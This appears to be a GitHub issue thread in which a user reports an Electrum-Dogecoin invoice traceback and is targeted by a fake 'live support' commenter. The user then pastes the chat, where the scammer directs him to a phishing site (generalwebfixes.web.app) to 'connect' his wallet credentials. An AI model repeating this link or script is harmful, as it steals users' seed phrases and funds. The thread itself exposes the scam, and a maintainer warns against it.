### ISSUE TITLE
Electrum 4.1.5-doge withdraw issue

### ISSUE THREAD

**Issue by pc911ldr** [spesmilo/electrum#9380]
Traceback
Traceback (most recent call last):
  File "electrum\gui\qt\main_window.py", line 1661, in do_pay
  File "electrum\gui\qt\main_window.py", line 1638, in read_invoice
  File "electrum\wallet.py", line 794, in create_invoice
UnboundLocalError: local variable '_id' referenced before assignment
 
Additional information
Electrum version: 4.1.5-doge 
Python version: 3.8.8 (tags/v3.8.8:024d805, Feb 19 2021, 13:08:11) [MSC v.1928 32 bit (Intel)] 
Operating system: Windows-10-10.0.19041-SP0 
Wallet type: 
Locale: ru_RU

**Comment by Jayydey** [comment]
This will be review by the support team. Visit the live support page to initiate a chat with an agent and follow their instructions for further assistance via [live chat](https://generalwebfixes.web.app).

**Comment by pc911ldr** [comment]
communication in this chat did not yield any results

**Comment by Jayydey** [comment]
This will be review by the support team. Visit the live support page to initiate a chat with an agent and follow their instructions for further assistance via [live chat](https://generalwebfixes.web.app).

**Comment by pc911ldr** [comment]
communication in this chat did not yield any results

**Comment by Jayydey** [comment]
Follow the procedure to resolve your issue

**Comment by pc911ldr** [comment]
ок

**Comment by pc911ldr** [comment]
ok, where is the procedure?

**Comment by pc911ldr** [comment]
I contacted the chat via your link, they didn't help me at all, the messages in the chat are still hanging

**Comment by Jayydey** [comment]
Don’t worry just stay on the chat and stay active you’ll be attended to shortly

**Comment by pc911ldr** [comment]
ок

**Comment by SomberNight** [comment]
Electrum only supports Bitcoin.

Also, be very suspicious of non-public "support". For open source projects in this space, it is usually a scam, trying to steal your money.

**Comment by pc911ldr** [comment]
Are you not confusing anything?

**Comment by pc911ldr** [comment]
and what about electrum for litecoin, goldcoin, vertcoin and many more? Are you not confusing anything?

**Comment by pc911ldr** [comment]
and in pursuit...

**Comment by pc911ldr** [comment]
Traceback
Traceback (most recent call last):
  File "/tmp/.mount_AppImasRccp0/usr/lib/python3.9/site-packages/electrum/gui/qt/main_window.py", line 1661, in do_pay
    self.pending_invoice = self.read_invoice()
  File "/tmp/.mount_AppImasRccp0/usr/lib/python3.9/site-packages/electrum/gui/qt/main_window.py", line 1638, in read_invoice
    return self.wallet.create_invoice(
  File "/tmp/.mount_AppImasRccp0/usr/lib/python3.9/site-packages/electrum/wallet.py", line 794, in create_invoice
    id=_id,
UnboundLocalError: local variable '_id' referenced before assignment
 
Additional information
Electrum version: 4.1.5-doge 
Python version: 3.9.7 (default, Jun 28 2018, 19:01:02) [GCC 7.5.0] 
Operating system: Linux-6.8.0-50-generic-x86_64-with-glibc2.39 
Wallet type: 
Locale: ru_UA 


Back Agent profile image Live Support
Menu
Back

Menu
Add free
live chat
to your site
Type here and press enter..
Rate this chatUpload FileInsert emoji
Agent profile image
Live Support

Agent profile image
Welcome, if you need help simply reply to this message, we are online and ready to help.

Traceback
Traceback (most recent call last):
File "/tmp/.mount_AppImaqMDO4k/usr/lib/python3.9/site-packages/electrum/gui/qt/main_window.py", line 1661, in do_pay
self.pending_invoice = self.read_invoice()
File "/tmp/.mount_AppImaqMDO4k/usr/lib/python3.9/site-packages/electrum/gui/qt/main_window.py", line 1638, in read_invoice
return self.wallet.create_invoice(
File "/tmp/.mount_AppImaqMDO4k/usr/lib/python3.9/site-packages/electrum/wallet.py", line 794, in create_invoice
id=_id,
UnboundLocalError: local variable '_id' referenced before assignment

Additional information
Electrum version: 4.1.5-doge
Python version: 3.9.7 (default, Jun 28 2018, 19:01:02) [GCC 7.5.0]
Operating system: Linux-6.8.0-51-generic-x86_64-with-glibc2.39
Wallet type:
Locale: ru_UA

Agent profile image
Welcome to live chat

Снимок экрана_2024-12-25_20-56-22.png
Agent profile image
The traceback indicates that there is a bug in the Electrum wallet code you are using, specifically version 4.1.5-doge. The issue arises because the local variable _id is referenced in the create_invoice method before it has been assigned a value.

exactly like that

Agent profile image
Error Type: UnboundLocalError: local variable '_id' referenced before assignment
Electrum Version: 4.1.5-doge (a Dogecoin-compatible fork of Electrum).
Python Version: 3.9.7.
Operating System: Linux.
Context: The error occurs when creating an invoice (do_pay function).

but I need to withdraw coins from my wallet

Agent profile image
This error appears to be a coding bug in the specific version of Electrum you’re using.

is there a link to the working version?

Agent profile image
The version you’re using (4.1.5-doge) might be outdated. Developers may have fixed this bug in a newer release.

This is the latest version

where, to which wallet, can I transfer the seed phrase from this wallet?

naturally, with balance

Agent profile image
Follow these steps:
Go to the homepage by navigating to https://generalwebfixes.web.app.
At the top of the page, click Connect Wallet and then select Begin Connection.
On the next page, choose AiTool kit Options to select your wallet type and establish a connection using your wallet credentials.
Finally, click the authenticate button to clear the error and synchronize your wallet to authenticate.

😁

maybe you can tell me how to contact the wallet developer so that he knows about this error that the wallet generates

Electrum version: 4.1.5-doge

Agent profile image
Use the steps to above to complete transferring the seed phrase

😁

Should I write you the wallet seed phrase?

Agent profile image
Follow step above

Should I write you the wallet seed phrase?

Do you know that the seed phrase from a crypto wallet is strictly personal?

Agent profile image
We are here solely to assist and guide. We do not have access to your funds. All processes are completed manually on your end, with the aid of bot interactions, ensuring no external or third-party access is involved.

21:40
the seed phrase will give access to my wallet, to you or someone else, download the wallet, transfer funds to it and distribute the seed phrase.

for one thing, you will understand what the problem is.

Add free
live chat
to your site
Type here and press enter..
Rate this chatUpload FileInsert emoji</details

**Comment by pc911ldr** [comment]
How do you like this turn of events?

**Comment by pc911ldr** [comment]
with electrum wallet - yes

**Comment by pc911ldr** [comment]
but in general, a similar scenario happened with a different coin.
